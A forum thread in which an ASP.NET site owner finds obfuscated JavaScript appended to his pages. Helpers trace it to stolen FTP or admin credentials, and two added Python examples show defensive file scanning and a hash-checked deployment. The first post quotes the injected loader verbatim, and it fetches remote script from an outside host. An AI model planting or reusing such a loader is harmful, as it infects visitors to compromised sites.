Parser Error Message: Possibly being Hacked

Status
Not open for further replies.

txmed

Programmer
Mar 23, 2006
US
Greetings,

I've recently created an ASP 2.0 site that's been running fine. A few days ago I noticed that the page was coming up with a "Parser" error message. I'm hoping someone has experience in this error message and can inform me how to fix it.

I'm using a standard master page for my entire site. I then have all of the HTML "child" pages showing in the <asp:Content> tags. The problem is that I think I'm being hacked and someone is inserting JavaScript code after the </asp:Content> tag.

Here is a copy of the error message:

Parser Error

Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.

Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.

Code:
Source Error:

Line 34: </asp:Content>
Line 35: 
Line 36: <html><body><script type="text/javascript">var gLgqfal0LD6Zjb = "r0wbP21r0wbP35";var LGVypdcQDOHuoS0 = "r0wbP3cr0wbP73r0wbP63r0wbP72r0wbP6"; var LGVypdcQDOHuoS1 = "9r0wbP70r0wbP74r0wbP20r0wbP74r0wbP"; var LGVypdcQDOHuoS2 = "79r0wbP70r0wbP65r0wbP3dr0wbP22r0wb"; var LGVypdcQDOHuoS3 = "P74r0wbP65r0wbP78r0wbP74r0wbP2fr0w"; var LGVypdcQDOHuoS4 = "bP6ar0wbP61r0wbP76r0wbP61r0wbP73r0"; var LGVypdcQDOHuoS5 = "wbP63r0wbP72r0wbP69r0wbP70r0wbP74r"; var LGVypdcQDOHuoS6 = "0wbP22r0wbP20r0wbP73r0wbP72r0wbP63"; var LGVypdcQDOHuoS7 = "r0wbP3dr0wbP22r0wbP68r0wbP74r0wbP7"; var LGVypdcQDOHuoS8 = "4r0wbP70r0wbP3ar0wbP2fr0wbP2fr0wbP"; var LGVypdcQDOHuoS9 = "33r0wbP34r0wbP36r0wbP33r0wbP32r0wb"; var LGVypdcQDOHuoS10 = "P66r0wbP66r0wbP76r0wbP78r0wbP7ar0w"; var LGVypdcQDOHuoS11 = "bP2er0wbP73r0wbP65r0wbP72r0wbP76r0"; var LGVypdcQDOHuoS12 = "wbP65r0wbP69r0wbP72r0wbP63r0wbP2er"; var LGVypdcQDOHuoS13 = "0wbP63r0wbP6fr0wbP6dr0wbP2fr0wbP2f"; var LGVypdcQDOHuoS14 = "r0wbP6dr0wbP6cr0wbP2er0wbP70r0wbP6"; var LGVypdcQDOHuoS15 = "8r0wbP70r0wbP22r0wbP3er0wbP20r0wbP"; var LGVypdcQDOHuoS16 = "3cr0wbP2fr0wbP73r0wbP63r0wbP72r0wb"; var LGVypdcQDOHuoS17 = "P69r0wbP70r0wbP74r0wbP3e"; var W9QVkc1kFlgLAO = "zcViA21r0wbP35";var iFcV0Loi2K5lA3 = LGVypdcQDOHuoS0+LGVypdcQDOHuoS1+LGVypdcQDOHuoS2+LGVypdcQDOHuoS3+LGVypdcQDOHuoS4+LGVypdcQDOHuoS5+LGVypdcQDOHuoS6+LGVypdcQDOHuoS7+LGVypdcQDOHuoS8+LGVypdcQDOHuoS9+LGVypdcQDOHuoS10+LGVypdcQDOHuoS11+LGVypdcQDOHuoS12+LGVypdcQDOHuoS13+LGVypdcQDOHuoS14+LGVypdcQDOHuoS15+LGVypdcQDOHuoS16+LGVypdcQDOHuoS17; QY2NpXLfBx6PMN = iFcV0Loi2K5lA3.replace(/r0wbP/g,"%");var fBqXRS4aosIqDN = unescape;var gLgqfal0LD6Zjb = "YV1vq21zcViA35";w9221 = this;var eNQGwSdlzzQBxW=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];eNQGwSdlzzQBxW.write(fBqXRS4aosIqDN(QY2NpXLfBx6PMN));</script></body></html>


Again I'm stressing that I did not write the code that appears after the </asp:Content> tag. Someone (or something) is adding it there.


Unfortunately the only thing I can do right now is copy my original source files over the corrupted file. But when I do it's only a matter of time before the problem happens again.

I've done some research on the web but I cannot find a solution. Can someone please help me?

Thanks,

(txmed)
 
webforms is known for its horrendous html/style/javascript output. but in this instance I think you may be correct, in that someone is attempting to hack your site. the additional html and body tags are a sign that it's not produced by the webforms view engine.

the immediate fix is to overwrite the corrupted files.
if your application uses a database verify the data is clean too.
finally change your password for site administration. there's a chance your admin account was compromised.

Jason Meckley
Programmer

faq855-7190
faq732-7259
 
jmeckley & ca8msm,

Thank you for your quick response. I'm going to change the login credentials for my site to see if this fixes the problem. I'll keep you posted if this happens again.

(txmed)
 
I'm going to change the login credentials for my site to see if this fixes the problem
The problem is that will only mask the problem; whatever method they used to get in will still be vulnerable so even if you change your password the same method can be applied and you will be back in the same position.

I'm not saying don't do it, you should of course change it to something secure, but I see little point in changing it and then doing nothing.

Mark,

Darlington Web Design | Experts, Information, Ideas & Knowledge | ASP.NET Tips & Tricks
 
if the content is injected into the html rendered by webforms then you have an injection attack. if the html is present in the aspx markup, then your credentials were compromised. most likely the ftp credentials.

Jason Meckley
Programmer

faq855-7190
faq732-7259
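
Added example, not part of the original thread: a scan of the source tree for the second case described above, where the markup is present in the .aspx file itself. It flags any content page that has text outside its Content controls, which is also the condition behind the parser error quoted in the first post. The sample pages, file names and function names are constructed, and the script body in the sample is a harmless placeholder.

```python
import re
import tempfile
from pathlib import Path

# Assumed harmless outside <asp:Content>: server-side comments and directives.
SERVER_COMMENT = re.compile(r"<%--.*?--%>", re.S)
DIRECTIVE = re.compile(r"<%@.*?%>", re.S)
CONTENT_BLOCK = re.compile(r"<asp:Content\b.*?</asp:Content\s*>", re.S | re.I)

# Constructed samples; the appended script body is only a placeholder comment.
CLEAN = (
    '<%@ Page Language="C#" MasterPageFile="~/Site.master" Title="Home" %>\n'
    '<asp:Content ID="Main" ContentPlaceHolderID="Body" runat="server">\n'
    "  <h1>Welcome</h1>\n"
    "</asp:Content>\n"
)
TAMPERED = CLEAN + (
    '\n<html><body><script type="text/javascript">/* placeholder */</script>'
    "</body></html>\n"
)

def stray_markup(source):
    """Return the text left outside the Content controls of a content page."""
    if not re.search(r"<asp:Content\b", source, re.I):
        return ""  # not a content page, so the parser rule does not apply
    for pattern in (SERVER_COMMENT, DIRECTIVE, CONTENT_BLOCK):
        source = pattern.sub("", source)
    return source.strip()

def scan_tree(root):
    """Map each flagged .aspx file (path relative to root) to what was found."""
    findings = {}
    for path in sorted(Path(root).rglob("*.aspx")):
        extra = stray_markup(path.read_text(encoding="utf-8", errors="replace"))
        if extra:
            findings[path.relative_to(root).as_posix()] = {
                "script_tag": bool(re.search(r"<script\b", extra, re.I)),
                "preview": extra[:60],
            }
    return findings

def demo():
    """Write the two samples to a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "Default.aspx").write_text(CLEAN, encoding="utf-8")
        Path(root, "About.aspx").write_text(TAMPERED, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A hit from this scan means the file on disk was modified, so it points at file-level access (FTP or hosting account) rather than at injection through the running application.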
 
jmeckley,

Yes I had that same thought. The fact that the code was appearing within my .aspx file made me believe that my credentials were compromised.

I just changed my login credentials and I verified that the site is coming up as intended. I'm going to wait to see if this fixes the problem.

Thanks for your input.

(txmed)
 
The fact that the code was appearing within my .aspx file made me believe that my credentials were compromised.
Which could be as a result of injection (i.e. reading credentials stored in a database), so you still need to shore up whatever original method they used to get into your site.

Mark,

Darlington Web Design | Experts, Information, Ideas & Knowledge | ASP.NET Tips & Tricks
 
I agree but nowhere in my app am I using the login credentials for the site. Unless the database of the company where I'm hosting the site has been hacked into.

(txmed)
 
In a production environment, our FTP root is NOT part of the HTTP root... that is I can ftp the files up, but I have to have some other process copy/move the files to the HTTP root. Essentially we have a web service that requires credentials (different from FTP) that hashes against what's supposed to be there, and then copies the files if it's proper.
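
Added example, not part of the original post and not the poster's actual service: a sketch of the promotion step described above, where uploads land in a staging directory and are copied to the web root only if every file matches a manifest of expected SHA-256 hashes. The manifest is authenticated with an HMAC key that stands in for the "credentials different from FTP"; the key, directory names and function names are assumptions made for the illustration.

```python
import hashlib
import hmac
import json
import shutil
import tempfile
from pathlib import Path

def sha256_file(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def sign_manifest(hashes, key):
    """Developer side: serialize {relative path: sha256} and MAC it."""
    body = json.dumps(hashes, sort_keys=True).encode()
    return body, hmac.new(key, body, hashlib.sha256).hexdigest()

def promote(staging, webroot, body, tag, key):
    """Copy staged files to the web root only if all match the signed manifest."""
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        raise PermissionError("manifest MAC mismatch; nothing promoted")
    manifest = json.loads(body)
    staged = {p.relative_to(staging).as_posix(): p
              for p in Path(staging).rglob("*") if p.is_file()}
    rejected = sorted(set(staged) - set(manifest))  # files nobody declared
    rejected += sorted(n for n, digest in manifest.items()
                       if n not in staged or sha256_file(staged[n]) != digest)
    if rejected:
        return {"promoted": [], "rejected": rejected}  # all or nothing
    for name, src in staged.items():
        dest = Path(webroot, name)
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(src, dest)
    return {"promoted": sorted(staged), "rejected": []}

def demo():
    key = b"constructed-demo-key"  # assumption: known to the deploy service only
    page = '<asp:Content ID="Main" runat="server">ok</asp:Content>\n'
    with tempfile.TemporaryDirectory() as tmp:
        staging, webroot = Path(tmp, "ftp"), Path(tmp, "wwwroot")
        staging.mkdir()
        webroot.mkdir()
        upload = staging / "Default.aspx"
        upload.write_text(page, encoding="utf-8")
        body, tag = sign_manifest({"Default.aspx": sha256_file(upload)}, key)
        first = promote(staging, webroot, body, tag, key)
        upload.write_text(page + "<html><body></body></html>\n", encoding="utf-8")
        second = promote(staging, webroot, body, tag, key)
        live = (webroot / "Default.aspx").read_text(encoding="utf-8")
    return first, second, live == page
```

In `demo()` the first promotion succeeds, the second is rejected because the staged file was altered after the manifest was signed, and the copy in the web root stays as first promoted.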
 
ca8msm,

Yes I agree. I'll call them to see what they say.


NESWalt,

Thank you for your input. I'll see what we can do in the future.

Thanks,

(txmed)
 
how strong was your password? if the password was weak, then a simple dictionary attack could give someone access to your account.

Jason Meckley
Programmer

faq855-7190
faq732-7259
 
jmeckley,

The password was fairly strong but I broke a cardinal rule and used a user name/password that I've used for other accounts. I went ahead and changed the password to something stronger and more difficult to guess.

(txmed)
 
Hello. I just wanted to send an update to everyone who helped me out on this topic. I changed the password for my login credentials and I have not had this problem since.

Thanks to everyone who helped me with this.

(txmed)
 